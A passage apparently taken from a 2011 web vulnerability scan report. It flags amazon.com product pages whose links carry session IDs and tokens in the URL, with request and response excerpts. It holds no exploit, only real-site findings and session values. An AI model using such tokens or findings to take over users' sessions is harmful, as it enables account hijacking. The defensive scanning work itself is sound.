  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_.HTpnb0BJD30K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB001AIM6V2%252Fref%253Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=dtp_dp_lm_B001AIM6V2/183-5857754-1541453?location=http://dtp.amazon.com/&token=ED7546842AF86000862C6B4CDB683D114A0EDF07
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8

Request

GET /dp/B001AIM6V2 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:46 GMT
Server: Server
x-amz-id-1: 0QB6JFD5370MK0QCZ6QW
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: aF0JiaUNwhyX+5d+IWlXePk8nKbtX+xMpBVLuDfuoQaOcPnQ3JMSv421E1jhCiDe
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-5857754-1541453; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 241990


<html>
<head>


<style type="text/css"><!--


BODY { font-
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_.HTpnb0BJD30K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_fa_dp_.HTpnb0BJD30K%26bodytext%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520December%25202007%252C%2520Vol.%252015%252C%2520No.%25208%252C%2520Sam%2520Elliott%2520by%2520Jason%2520Bell" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_.HTpnb0BJD30K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_fa_dp_.HTpnb0BJD30K%26bodytext%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520December%25202007%252C%2520Vol.%252015%252C%2520No.%25208%252C%2520Sam%2520Elliott%2520by%2520Jason%2520Bell', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_.HTpnb0BJD30K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB001AIM6V2%252Fref%253Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_.HTpnb0BJD30K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB001AIM6V2%252Fref%253Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DCowboys%2520%2526%2520Indians%2520The%2520Premier%2520Magazine%2520of%2520the%2520West%252C%2520Annual%2520Holiday%2520Gift%2520Guide%2520...%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB001AIM6V2%2Fref%3Dcm_sw_r_tw_dp_.HTpnb0BJD30K%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<div class="content">
If you are a publisher or author and hold the digital rights to a book, you can sell a digital version of it in our Kindle Store.
<a href="/gp/redirect.html/ref=dtp_dp_lm_B001AIM6V2/183-5857754-1541453?location=http://dtp.amazon.com/&amp;token=ED7546842AF86000862C6B4CDB683D114A0EDF07">Learn more</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_ir/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Investor Relations</a>
...[SNIP]...
<li><a href="/gp/redirect.html/ref=gw_m_b_pr/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8">Press Releases</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Sell on Amazon</a>
...[SNIP]...
<li><a href="/gp/redirect.html/183-5857754-1541453?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8">Advertise Your Products</a>
...[SNIP]...

9.74. http://www.amazon.com/dp/B0037UT1LY

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.amazon.com
Path:   /dp/B0037UT1LY

Issue detail

The response contains the following links that appear to contain session tokens:
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_1?ie=UTF8&quantity.1=1&asin.1=B002MUANJO&offeringID.1=d8K1%252Fm6UOREHQlCtrYEptb8jMsSEVdnLgNV3MlH3pPN9aY1LCJ0g3D7lVs8EGz5G8dDCEOwUppestK9Pr7x5hz%252FzJGd4%252BJyFu1AcuhcUELk%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_2?ie=UTF8&quantity.1=1&asin.1=B0015KXFB0&offeringID.1=dPZwUuWIn7aLqmxgg%252BjCgiuaxqNpRWrzo4Di%252FXWk3tpcNOVR2ic8UMwQfBCYMiIPv88Sr%252FpMpv2D8tebeZKc2OJ%252FiNITORk6WRd38ybBcCiNhR74Myv%252BuWo6AL46VKb%252FlwR2eCYUqJNSGx%252FAx83oiw%253D%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_3?ie=UTF8&quantity.1=1&asin.1=B002MUANJE&offeringID.1=FHX6W4xZv2nO0UX3UqVMr%252FzNDLEXmT%252FB%252B1magCc6i%252BQxzKXdSBqJmIdiJawfdz0sGdc0vL51Z0JAd6MMtgzF8wG87YFsHv2nQKKIGvJq3KE%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_4?ie=UTF8&quantity.1=1&asin.1=B002MUANJY&offeringID.1=7gAbqnGxEGlnxtTGcXMEA3MPQ5P079563XjAzzloVPxnANdjhrq%252BrTp9BPd3kQQNt2ob7DmCYaRZFqyTqskQ6s%252FcxkAuczJL5RokNGe0aGOoi%252BSpDE4ayZWDOZSeLpb5YoTxoPPqDXc%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_5?ie=UTF8&quantity.1=1&asin.1=B002PUEFV8&offeringID.1=WDHKpkXI%252ByhvTuGDIU02ixhCur4MDNaUGuIZbeFTo%252FJT9DUppLEkCmnMMzip5lrLoiyB3xJ4eqss2%252BMm6hAKchAp0lnBJFUOe00t9DJumUyWAeROhD1MZfGXSkk4%252B3iAeWSbbnkLFEU%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_6?ie=UTF8&quantity.1=1&asin.1=B002DPVAWW&offeringID.1=S7HZPe8%252B15O23zcf8ATavWOISw5yOv5Qx%252FHzP6dOxT00OMpphlpr3bFP62fUNa0YQl4VDvmbo0BDGdYG5%252Bn7tvUNZPCfsI0M%252BAlxkltb%252BMO7TFTdxXi2cmee6qstT89j%252BtV4KX%252FSvqKLBTOklxhrLA%253D%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=acc_glance_t_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B0037UT1LY&offeringID.1=rkwIMZZaSgvr4svmE08Xdp0Zvs0a6lOb3V%252FgiWkSghsPwExTjR%252FusHmmDDFEFaC%252FG9moGAZPyQkP7YM6S5A34u24NpGrxIsQfG2UvF2qOVZD7PwKNntZJQfQ25cJ8Mq12YcFHlmlhJ82jiRVySaaGg%253D%253D&action=addToCart&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=2MQwY8ILcK2Djroj0nDPMkclnVrTsEUHfT%252BACxyBzT9IwaPKymXMiWHbirwLUl%252BLlB6KnjYE0DHaX4sKC%252FSm0roI88JUO8tTZg40NNL0lWq1WADKosS7yl6gCfNOLU%252BOELWNK%252FM4DbK9o1SxfRRxtw%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=hFH%252FnXsvArLZuxA5VsV2bRxJ5TtTyy4a6s4kw3lZFJ%252F3%252FTAJrp%252FD3hmR%252BBxX%252B19Vo2FXjMA3i8YV%252FGpnBK7ej4ojUb0uxjchN%252FCFvt6KhpI%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=m6tqI6V85bHKCYXLGAOtzbiXML7xbuF3y4iZ6QlWlKK611a4wb7QYfeot4kROj1sxWE%252Bkknb4wUinKTz7opq2bsj9kiVwYLtw9GKznBMqheaYVgLBZSCnR1CldfL%252FMruypPW3Iv6A3Kgck8ONn%252B%252B8g%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444
  • http://www.amazon.com/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fproduct-ads-on-amazon.htm%3Fld%3DAZPADSFooter&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fwww.amazonservices.com%2Fcontent%2Fsell-on-amazon.htm%3Fld%3DAZFSSOA&token=1E60AB4AC0ECCA00151B45353E21782E539DC601&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_fa_dp_UHTpnb0X2T93K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_fa_dp_UHTpnb0X2T93K%26bodytext%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel
  • http://www.amazon.com/gp/redirect.html/ref=cm_sw_cl_tw_dp_UHTpnb0X2T93K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0037UT1LY%252Fref%253Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26count%3Dnone
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_ir/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-irhome%26c%3D97664&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/redirect.html/ref=gw_m_b_pr/176-7245636-0301444?ie=UTF8&location=http%3A%2F%2Fphx.corporate-ir.net%2Fphoenix.zhtml%3Fp%3Dirol-mediaHome%26c%3D176060&token=F9CAD8A11D4336B5E0B3C3B089FA066D0A467C1C&_encoding=UTF8
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=952A55443DE535C674144B4B50975586C564AF63&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=716046978E703253E84668EF4520AD74C3A477CE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R2G1YNO8TYSTFG/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=130B144A4B8E0EE043FCE0F577C0134E680EF73C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R2G1YNO8TYSTFG.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=F9E4FC2F330A125F9BEC925FDF9B545CB94E2AE9&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=110D03D592568CCC2645B836D1FE534FD2AB2EE6&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/R41LO7UN11ZK2/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=2632FAA0EF944C7D3FD85985089887E0EA069878&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=R41LO7UN11ZK2.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/-1/ref=cm_cr_dpvoteyn?ie=UTF8&token=19E386ED73EE38C637913A60DBBA7BA7DE3D291C&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Helpful/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=71D4F57801B78A8A0E759AA065E26598CA7062F1&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Helpful.Reviews&voteSessionID=176-7245636-0301444
  • http://www.amazon.com/gp/voting/cast/Reviews/2115/RXL9X3C3UMYJ8/Inappropriate/1/ref=cm_cr_dpvoteyn?ie=UTF8&token=BECF36648BA15CC8223E604717807B1C208163DE&target=aHR0cDovL3d3dy5hbWF6b24uY29tL2dwL3Byb2R1Y3QvQjAwMzdVVDFMWS9yZWY9Y21fY3JfZHB2b3RlcmRyP2llPVVURjgmaXNTUkFkbWluPQ&voteAnchorName=RXL9X3C3UMYJ8.2115.Inappropriate.Reviews&voteSessionID=176-7245636-0301444

Request

GET /dp/B0037UT1LY HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:04:28 GMT
Server: Server
x-amz-id-1: 0AX624TG9G36KCASMW03
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: SKdNFc6SoUz62VgRyWT/5zZzRr16uXxYucSqwtyFd8UNcX2Q+8G5VWeik3qbT8iP
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-7245636-0301444; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 438322


<html>
<head>


<style type="text/css"><!--


BODY { font
...[SNIP]...
<span id="mbc_B0037UT1LY_A17HJW7ABLGDE2_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=2MQwY8ILcK2Djroj0nDPMkclnVrTsEUHfT%252BACxyBzT9IwaPKymXMiWHbirwLUl%252BLlB6KnjYE0DHaX4sKC%252FSm0roI88JUO8tTZg40NNL0lWq1WADKosS7yl6gCfNOLU%252BOELWNK%252FM4DbK9o1SxfRRxtw%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444" ><span>
...[SNIP]...
<span id="mbc_B0037UT1LY_A2F3P27I0U20DY_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=m6tqI6V85bHKCYXLGAOtzbiXML7xbuF3y4iZ6QlWlKK611a4wb7QYfeot4kROj1sxWE%252Bkknb4wUinKTz7opq2bsj9kiVwYLtw9GKznBMqheaYVgLBZSCnR1CldfL%252FMruypPW3Iv6A3Kgck8ONn%252B%252B8g%253D%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444" ><span>
...[SNIP]...
<span id="mbc_B0037UT1LY_ATVPDKIKX0DER_atc"><a class="swSprite s_add2CartSm " href="/gp/item-dispatch/ref=dp_ebb_$merchantCount?ie=UTF8&storeID=toys-and-games&nodeID=165793011&itemCount=1&offeringID.1=hFH%252FnXsvArLZuxA5VsV2bRxJ5TtTyy4a6s4kw3lZFJ%252F3%252FTAJrp%252FD3hmR%252BBxX%252B19Vo2FXjMA3i8YV%252FGpnBK7ej4ojUb0uxjchN%252FCFvt6KhpI%253D&submit.addToCart=addToCart&signInToHUC=0&session-id=176-7245636-0301444" ><span>
...[SNIP]...
</a>
<a href="/gp/redirect.html/ref=cm_sw_cl_fa_dp_UHTpnb0X2T93K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&amp;location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_fa_dp_UHTpnb0X2T93K%26bodytext%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_fa_dp_UHTpnb0X2T93K?token=6BD0FB927CC51E76FF446584B1040F70EA7E88E1&location=http%3A%2F%2Fwww.facebook.com%2Fshare.php%3Fu%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_fa_dp_UHTpnb0X2T93K%26bodytext%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: 0 -1px; height: 15px; width: 15px;">
...[SNIP]...
</a><a href="/gp/redirect.html/ref=cm_sw_cl_tw_dp_UHTpnb0X2T93K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&amp;location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0037UT1LY%252Fref%253Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26count%3Dnone" target="_blank" onclick="window.open('/gp/redirect.html/ref=cm_sw_cl_tw_dp_UHTpnb0X2T93K?token=7A1A4AE8F6CE0BD277D8295E58702D283F329C0F&location=http%3A%2F%2Ftwitter.com%2Fshare%3Foriginal_referer%3Dhttp%253A%252F%252Fwww.amazon.com%252Fgp%252Fproduct%252FB0037UT1LY%252Fref%253Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26related%3Damazondeals%2Camazonmp3%26via%3Damazon%26text%3DBarbie%2520Collector%25202010%2520Holiday%2520Doll%2520by%2520Mattel%26url%3Dhttp%3A%2F%2Fwww.amazon.com%2Fgp%2Fproduct%2FB0037UT1LY%2Fref%3Dcm_sw_r_tw_dp_UHTpnb0X2T93K%26count%3Dnone', '_blank', 'location=yes,width=700,height=400');return false;"><span class="tafSocialButton" style="background-position: -15px -1px; height: 15px; width: 15px;">
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_mainitem_atc?ie=UTF8&quantity.1=1&asin.1=B0037UT1LY&offeringID.1=rkwIMZZaSgvr4svmE08Xdp0Zvs0a6lOb3V%252FgiWkSghsPwExTjR%252FusHmmDDFEFaC%252FG9moGAZPyQkP7YM6S5A34u24NpGrxIsQfG2UvF2qOVZD7PwKNntZJQfQ25cJ8Mq12YcFHlmlhJ82jiRVySaaGg%253D%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B0037UT1LY" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_1?ie=UTF8&quantity.1=1&asin.1=B002MUANJO&offeringID.1=d8K1%252Fm6UOREHQlCtrYEptb8jMsSEVdnLgNV3MlH3pPN9aY1LCJ0g3D7lVs8EGz5G8dDCEOwUppestK9Pr7x5hz%252FzJGd4%252BJyFu1AcuhcUELk%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002MUANJO" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_2?ie=UTF8&quantity.1=1&asin.1=B0015KXFB0&offeringID.1=dPZwUuWIn7aLqmxgg%252BjCgiuaxqNpRWrzo4Di%252FXWk3tpcNOVR2ic8UMwQfBCYMiIPv88Sr%252FpMpv2D8tebeZKc2OJ%252FiNITORk6WRd38ybBcCiNhR74Myv%252BuWo6AL46VKb%252FlwR2eCYUqJNSGx%252FAx83oiw%253D%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B0015KXFB0" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_3?ie=UTF8&quantity.1=1&asin.1=B002MUANJE&offeringID.1=FHX6W4xZv2nO0UX3UqVMr%252FzNDLEXmT%252FB%252B1magCc6i%252BQxzKXdSBqJmIdiJawfdz0sGdc0vL51Z0JAd6MMtgzF8wG87YFsHv2nQKKIGvJq3KE%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002MUANJE" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_4?ie=UTF8&quantity.1=1&asin.1=B002MUANJY&offeringID.1=7gAbqnGxEGlnxtTGcXMEA3MPQ5P079563XjAzzloVPxnANdjhrq%252BrTp9BPd3kQQNt2ob7DmCYaRZFqyTqskQ6s%252FcxkAuczJL5RokNGe0aGOoi%252BSpDE4ayZWDOZSeLpb5YoTxoPPqDXc%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002MUANJY" ><span>
...[SNIP]...
<span class="cart_button">
<a class="dpSprite s_addToCart " href="/gp/item-dispatch/ref=acc_glance_t_ai_BST_atc_5?ie=UTF8&quantity.1=1&asin.1=B002PUEFV8&offeringID.1=WDHKpkXI%252ByhvTuGDIU02ixhCur4MDNaUGuIZbeFTo%252FJT9DUppLEkCmnMMzip5lrLoiyB3xJ4eqss2%252BMm6hAKchAp0lnBJFUOe00t9DJumUyWAeROhD1MZfGXSkk4%252B3iAeWSbbnkLFEU%253D&action=addToCart&session-id=176-7245636-0301444" id="acc_cartadd_button_B002PUEFV8" ><span>
...[SNIP]...
<span class="cart_button">
